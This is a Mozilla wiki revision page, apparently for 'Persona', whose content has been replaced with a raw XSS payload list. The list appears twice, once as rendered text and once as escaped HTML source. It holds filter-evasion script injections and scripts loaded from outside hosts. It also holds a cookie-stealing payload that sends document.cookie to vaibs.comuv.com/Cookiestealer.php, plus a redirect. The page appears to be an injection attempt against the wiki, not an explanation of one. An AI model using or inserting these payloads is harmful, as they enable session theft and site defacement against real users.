mozilla

Revision 320029 of Persona

  • Revision slug: Persona
  • Revision title: Persona
  • Revision id: 320029
  • Created:
  • Creator: Vaibs
  • Is current revision? No
  • Comment

Revision Content

<script>alert(1)</script> 
onmouseover=alert("XSS")
<font style="color:expression(alert(1))">abc</font>
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
//";alert(String.fromCharCode(88,83,83))
  “><script >alert(document.cookie)</script>
   “><script >prompt(alert(document.cookie))</script>
  <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
'"><iframe src=//xssed.com>&FromMail=&Me
  '"><iframe src=alert(document.cookie)>&FromMail=&Me

'; alert(1); '
<a href=javascript: { {({}{}()())}alert('xss') ) ) }>
<div onload..;,;..'alert(\"xss_attack\");'>
<a href='javascript:{ alert(\"xss_attack\"); otherxss();}'
onclick= 'alert(\"xss_attack\");' onhover='alert
(\"xss_attack\");' onmouseout=alert(\"xss_attack\")
class='thisclass'> link</a>
style='width:expression(alert(\"xss_attack\"));
%253cscript%253ealert(document.cookie)%253c/script%253e
  “><s”%2b”cript>alert(document.cookie)</script>
var i=0; for(i=0;i<=5;i++){alert('Cross Website Scripting');}
  “><ScRiPt>alert(document.cookie)</script>
  “><<script>alert(document.cookie);//<</script>
foo%00<script>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
   /*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"/-alert(1)//><img src=1onerror=alert(1)>'

‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
"><#$%&/><img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>Other XSS that don’t require <script>:
<BODY ONLOAD=alert(’XSS’)>
</textarea>"><#$%&/><script>alert(document.cookie)</script>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="   javascript:alert('XSS'); "onclick="startGateway('NDcyNjMx');">
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT SRC=//ha.ckers.org/.j>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">

<LAYER SRC="http:&lt;script&gt;alert(1)&lt;/script&gt;     
onmouseover=alert("XSS")
<font style="color:expression(alert(1))">abc</font>
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
//";alert(String.fromCharCode(88,83,83))
     “><script >alert(document.cookie)</script>
         “><script >prompt(alert(document.cookie))</script>
        <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
    '"><iframe src=//xssed.com>&FromMail=&Me
        '"><iframe src=alert(document.cookie)>&FromMail=&Me

'; alert(1); '
<a href=javascript: { {({}{}()())}alert('xss') ) ) }>
<div onload..;,;..'alert(\"xss_attack\");'>
<a href='javascript:{ alert(\"xss_attack\"); otherxss();}'
 onclick= 'alert(\"xss_attack\");' onhover='alert
(\"xss_attack\");' onmouseout=alert(\"xss_attack\")
class='thisclass'> link</a>
style='width:expression(alert(\"xss_attack\"));
    %253cscript%253ealert(document.cookie)%253c/script%253e
        “><s”%2b”cript>alert(document.cookie)</script>
    var i=0; for(i=0;i<=5;i++){alert('Cross Website Scripting');}
        “><ScRiPt>alert(document.cookie)</script>
        “><<script>alert(document.cookie);//<</script>
    foo%00<script>alert(document.cookie)</script>
    %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
            /*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"/-alert(1)//><img src=1onerror=alert(1)>'

    ‘; alert(document.cookie); var foo=’
    foo\’; alert(document.cookie);//’;
    </script><script >alert(document.cookie)</script>
    "><#$%&/><img src=asdf onerror=alert(document.cookie)>
    <BODY ONLOAD=alert(’XSS’)>Other XSS that don’t require <script>:    
    <BODY ONLOAD=alert(’XSS’)>
</textarea>"><#$%&/><script>alert(document.cookie)</script>
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    <IMG SRC="jav    ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    <IMG SRC="   javascript:alert('XSS'); "onclick="startGateway('NDcyNjMx');">
    <iframe src=http://ha.ckers.org/scriptlet.html <
    <SCRIPT SRC=//ha.ckers.org/.j>
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    <BODY BACKGROUND="javascript:alert('XSS')">
    <BODY ONLOAD=alert('XSS')>
    <IMG DYNSRC="javascript:alert('XSS')">
    <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
    </TITLE><SCRIPT>alert("XSS");</SCRIPT>
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    <IMG LOWSRC="javascript:alert('XSS')">
    <BR SIZE="&{alert('XSS')}">
    
    <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
    Pic pop "><script>location="http://vaibs.comuv.com/MS.jpg";</script>
    steal cookie "><Script>document.location = 'http://vaibs.comuv.com/Cookiestealer.php?cookie=' + document.cookie; </Script>
     redirect <meta http-equiv="refresh" content="0;url=http://www.facebook.com/vaibstechboy" />
     <script>alert("1337`")</script> <BODY ONLOAD=alert(document.cookie)>"><script>alert(1337`);</script> <script>window.document.write("<input type='file'>");</script> <a rel='nofollow' href='search?searchterm=<b>war10rd made you click on link</b>'>war10rd`</a>
     '+alert(1)+'     
     +ADw-script+AD4-alert(/xss/)+ADsAPA-/script+AD4-
     +ADw-script+AD4-document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,115,105,116,101,119,97,116,99,104,47,113,97,47,99,111,111,107,105,101,46,112,104,112,47).concat(document.cookie).concat(String.fromCharCode(20,47,62)))+ADsAPA-/script+AD4-
         +}<%2Fstyle><script>a%3Deval%3Bb%3Dalert%3Ba(b(%2FXSS%2F.source))%3B<%2Fscript><MARQUEE+BGCOLOR%3D"RED"><H1>XSS3d+by+haRI(topsecure.net)<%2FH1><%2FMARQUEE>
    
    
//ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Pic pop "><script>location="http://vaibs.comuv.com/MS.jpg";</script>
steal cookie "><Script>bbbvvvdocument.location = 'http://vaibs.comuv.com/Cookiestealer.php?cookie=' + document.cookie; </Script>
  redirect <meta http-equiv="refresh" content="0;url=http://www.facebook.com/vaibstechboy" />
  <script>alert("1337`")</script> <BODY ONLOAD=alert(document.cookie)>"><script>alert(1337`);</script> <script>window.document.write("<input type='file'>");</script> <a rel='nofollow' href='search?searchterm=<b>war10rd mbade you click on link</b>'>war10rd`</a>
  '+alert(1)+' 
  +ADw-script+AD4-alert(/xss/)+ADsAPA-/script+AD4-
  +ADw-script+AD4-document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,115,105,116,101,119,97,116,99,104,47,113,97,47,99,111,111,107,105,101,46,112,104,112,47).concat(document.cookie).concat(String.fromCharCode(20,47,62)))+ADsAPA-/script+AD4-
   +}<%2Fstyle><script>a%3Deval%3Bb%3Dalert%3Ba(b(%2FXSS%2F.source))%3B<%2Fscript><MARQUEE+BGCOLOR%3D"RED"><H1>XSS3d+by+haRI(topsecure.net)<%2FH1><%2FMARQUEE>
 
 b

Revision Source

<p>&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&nbsp;<br />
  onmouseover=alert("XSS")<br />
  &lt;font style="color:expression(alert(1))"&gt;abc&lt;/font&gt;<br />
  //--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;<br />
  //";alert(String.fromCharCode(88,83,83))<br />
  &nbsp; “&gt;&lt;script &gt;alert(document.cookie)&lt;/script&gt;<br />
  &nbsp;&nbsp; “&gt;&lt;script &gt;prompt(alert(document.cookie))&lt;/script&gt;<br />
  &nbsp; &lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/scr&lt;/script&gt;ipt&gt;<br />
  '"&gt;&lt;iframe src=//xssed.com&gt;&amp;FromMail=&amp;Me<br />
  &nbsp; '"&gt;&lt;iframe src=alert(document.cookie)&gt;&amp;FromMail=&amp;Me</p>
<p>'; alert(1); '<br />
  &lt;a href=javascript: { {({}{}()())}alert('xss') ) ) }&gt;<br />
  &lt;div onload..;,;..'alert(\"xss_attack\");'&gt;<br />
  &lt;a href='javascript:{ alert(\"xss_attack\"); otherxss();}'<br />
  onclick= 'alert(\"xss_attack\");' onhover='alert<br />
  (\"xss_attack\");' onmouseout=alert(\"xss_attack\")<br />
  class='thisclass'&gt; link&lt;/a&gt;<br />
  style='width:expression(alert(\"xss_attack\"));<br />
  %253cscript%253ealert(document.cookie)%253c/script%253e<br />
  &nbsp; “&gt;&lt;s”%2b”cript&gt;alert(document.cookie)&lt;/script&gt;<br />
  var i=0; for(i=0;i&lt;=5;i++){alert('Cross Website Scripting');}<br />
  &nbsp; “&gt;&lt;ScRiPt&gt;alert(document.cookie)&lt;/script&gt;<br />
  &nbsp; “&gt;&lt;&lt;script&gt;alert(document.cookie);//&lt;&lt;/script&gt;<br />
  foo%00&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
  %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E<br />
  &nbsp;&nbsp; /*--&gt;]]&gt;%&gt;?&gt;&lt;/object&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;'-/"/-alert(1)//&gt;&lt;img src=1onerror=alert(1)&gt;'</p>
<p>‘; alert(document.cookie); var foo=’<br />
  foo\’; alert(document.cookie);//’;<br />
  &lt;/script&gt;&lt;script &gt;alert(document.cookie)&lt;/script&gt;<br />
  "&gt;&lt;#$%&amp;/&gt;&lt;img src=asdf onerror=alert(document.cookie)&gt;<br />
  &lt;BODY ONLOAD=alert(’XSS’)&gt;Other XSS that don’t require &lt;script&gt;:<br />
  &lt;BODY ONLOAD=alert(’XSS’)&gt;<br />
  &lt;/textarea&gt;"&gt;&lt;#$%&amp;/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
  &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
  &lt;IMG SRC="jav ascript:alert('XSS');"&gt;<br />
  &lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;<br />
  &lt;IMG SRC=" &nbsp; javascript:alert('XSS'); "onclick="startGateway('NDcyNjMx');"&gt;<br />
  &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
  &lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
  &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;<br />
  &lt;BODY BACKGROUND="javascript:alert('XSS')"&gt;<br />
  &lt;BODY ONLOAD=alert('XSS')&gt;<br />
  &lt;IMG DYNSRC="javascript:alert('XSS')"&gt;<br />
  &lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;<br />
  &lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;<br />
  &lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;<br />
  &lt;IMG LOWSRC="javascript:alert('XSS')"&gt;<br />
  &lt;BR SIZE="&amp;{alert('XSS')}"&gt;<br />
  <br />
  &lt;LAYER SRC="http:&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt; &nbsp;&nbsp; &nbsp;<br />
  onmouseover=alert("XSS")<br />
  &lt;font style="color:expression(alert(1))"&gt;abc&lt;/font&gt;<br />
  //--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;<br />
  //";alert(String.fromCharCode(88,83,83))<br />
  &nbsp;&nbsp; &nbsp; “&gt;&lt;script &gt;alert(document.cookie)&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp; “&gt;&lt;script &gt;prompt(alert(document.cookie))&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/scr&lt;/script&gt;ipt&gt;<br />
  &nbsp;&nbsp; &nbsp;'"&gt;&lt;iframe src=//xssed.com&gt;&amp;FromMail=&amp;Me<br />
  &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;'"&gt;&lt;iframe src=alert(document.cookie)&gt;&amp;FromMail=&amp;Me<br />
  <br />
  '; alert(1); '<br />
  &lt;a href=javascript: { {({}{}()())}alert('xss') ) ) }&gt;<br />
  &lt;div onload..;,;..'alert(\"xss_attack\");'&gt;<br />
  &lt;a href='javascript:{ alert(\"xss_attack\"); otherxss();}'<br />
  &nbsp;onclick= 'alert(\"xss_attack\");' onhover='alert<br />
  (\"xss_attack\");' onmouseout=alert(\"xss_attack\")<br />
  class='thisclass'&gt; link&lt;/a&gt;<br />
  style='width:expression(alert(\"xss_attack\"));<br />
  &nbsp;&nbsp; &nbsp;%253cscript%253ealert(document.cookie)%253c/script%253e<br />
  &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;“&gt;&lt;s”%2b”cript&gt;alert(document.cookie)&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;var i=0; for(i=0;i&lt;=5;i++){alert('Cross Website Scripting');}<br />
  &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;“&gt;&lt;ScRiPt&gt;alert(document.cookie)&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;“&gt;&lt;&lt;script&gt;alert(document.cookie);//&lt;&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;foo%00&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E<br />
  &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;/*--&gt;]]&gt;%&gt;?&gt;&lt;/object&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;'-/"/-alert(1)//&gt;&lt;img src=1onerror=alert(1)&gt;'<br />
  <br />
  &nbsp;&nbsp; &nbsp;‘; alert(document.cookie); var foo=’<br />
  &nbsp;&nbsp; &nbsp;foo\’; alert(document.cookie);//’;<br />
  &nbsp;&nbsp; &nbsp;&lt;/script&gt;&lt;script &gt;alert(document.cookie)&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;"&gt;&lt;#$%&amp;/&gt;&lt;img src=asdf onerror=alert(document.cookie)&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;BODY ONLOAD=alert(’XSS’)&gt;Other XSS that don’t require &lt;script&gt;:&nbsp;&nbsp; &nbsp;<br />
  &nbsp;&nbsp; &nbsp;&lt;BODY ONLOAD=alert(’XSS’)&gt;<br />
  &lt;/textarea&gt;"&gt;&lt;#$%&amp;/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;IMG SRC="jav&nbsp;&nbsp; &nbsp;ascript:alert('XSS');"&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;IMG SRC=" &nbsp; javascript:alert('XSS'); "onclick="startGateway('NDcyNjMx');"&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
  &nbsp;&nbsp; &nbsp;&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;BODY BACKGROUND="javascript:alert('XSS')"&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;BODY ONLOAD=alert('XSS')&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;IMG DYNSRC="javascript:alert('XSS')"&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;IMG LOWSRC="javascript:alert('XSS')"&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;BR SIZE="&amp;{alert('XSS')}"&gt;<br />
  &nbsp;&nbsp; &nbsp;<br />
  &nbsp;&nbsp; &nbsp;&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;<br />
  &nbsp;&nbsp; &nbsp;&lt;LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"&gt;<br />
  &nbsp;&nbsp; &nbsp;Pic pop "&gt;&lt;script&gt;location="http://vaibs.comuv.com/MS.jpg";&lt;/script&gt;<br />
  &nbsp;&nbsp; &nbsp;steal cookie "&gt;&lt;Script&gt;document.location = 'http://vaibs.comuv.com/Cookiestealer.php?cookie=' + document.cookie; &lt;/Script&gt;<br />
  &nbsp;&nbsp; &nbsp; redirect &lt;meta http-equiv="refresh" content="0;url=http://www.facebook.com/vaibstechboy" /&gt;<br />
  &nbsp;&nbsp; &nbsp; &lt;script&gt;alert("1337`")&lt;/script&gt; &lt;BODY ONLOAD=alert(document.cookie)&gt;"&gt;&lt;script&gt;alert(1337`);&lt;/script&gt; &lt;script&gt;window.document.write("&lt;input type='file'&gt;");&lt;/script&gt; &lt;a rel='nofollow' href='search?searchterm=&lt;b&gt;war10rd made you click on link&lt;/b&gt;'&gt;war10rd`&lt;/a&gt;<br />
  &nbsp;&nbsp; &nbsp; '+alert(1)+' &nbsp;&nbsp; &nbsp;<br />
  &nbsp;&nbsp; &nbsp; +ADw-script+AD4-alert(/xss/)+ADsAPA-/script+AD4-<br />
  &nbsp;&nbsp; &nbsp; +ADw-script+AD4-document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,115,105,116,101,119,97,116,99,104,47,113,97,47,99,111,111,107,105,101,46,112,104,112,47).concat(document.cookie).concat(String.fromCharCode(20,47,62)))+ADsAPA-/script+AD4-<br />
  &nbsp;&nbsp; &nbsp; &nbsp;&nbsp; &nbsp;+}&lt;%2Fstyle&gt;&lt;script&gt;a%3Deval%3Bb%3Dalert%3Ba(b(%2FXSS%2F.source))%3B&lt;%2Fscript&gt;&lt;MARQUEE+BGCOLOR%3D"RED"&gt;&lt;H1&gt;XSS3d+by+haRI(topsecure.net)&lt;%2FH1&gt;&lt;%2FMARQUEE&gt;<br />
  &nbsp;&nbsp; &nbsp;<br />
  &nbsp;&nbsp; &nbsp;<br />
  //ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;<br />
  &lt;LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"&gt;<br />
  Pic pop "&gt;&lt;script&gt;location="http://vaibs.comuv.com/MS.jpg";&lt;/script&gt;<br />
  steal cookie "&gt;&lt;Script&gt;bbbvvvdocument.location = 'http://vaibs.comuv.com/Cookiestealer.php?cookie=' + document.cookie; &lt;/Script&gt;<br />
  &nbsp; redirect &lt;meta http-equiv="refresh" content="0;url=http://www.facebook.com/vaibstechboy" /&gt;<br />
  &nbsp; &lt;script&gt;alert("1337`")&lt;/script&gt; &lt;BODY ONLOAD=alert(document.cookie)&gt;"&gt;&lt;script&gt;alert(1337`);&lt;/script&gt; &lt;script&gt;window.document.write("&lt;input type='file'&gt;");&lt;/script&gt; &lt;a rel='nofollow' href='search?searchterm=&lt;b&gt;war10rd mbade you click on link&lt;/b&gt;'&gt;war10rd`&lt;/a&gt;<br />
  &nbsp; '+alert(1)+'&nbsp;<br />
  &nbsp; +ADw-script+AD4-alert(/xss/)+ADsAPA-/script+AD4-<br />
  &nbsp; +ADw-script+AD4-document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,115,105,116,101,119,97,116,99,104,47,113,97,47,99,111,111,107,105,101,46,112,104,112,47).concat(document.cookie).concat(String.fromCharCode(20,47,62)))+ADsAPA-/script+AD4-<br />
  &nbsp;&nbsp; +}&lt;%2Fstyle&gt;&lt;script&gt;a%3Deval%3Bb%3Dalert%3Ba(b(%2FXSS%2F.source))%3B&lt;%2Fscript&gt;&lt;MARQUEE+BGCOLOR%3D"RED"&gt;&lt;H1&gt;XSS3d+by+haRI(topsecure.net)&lt;%2FH1&gt;&lt;%2FMARQUEE&gt;<br />
  &nbsp;<br />
  &nbsp;<code>b</code></p>
Revert to this revision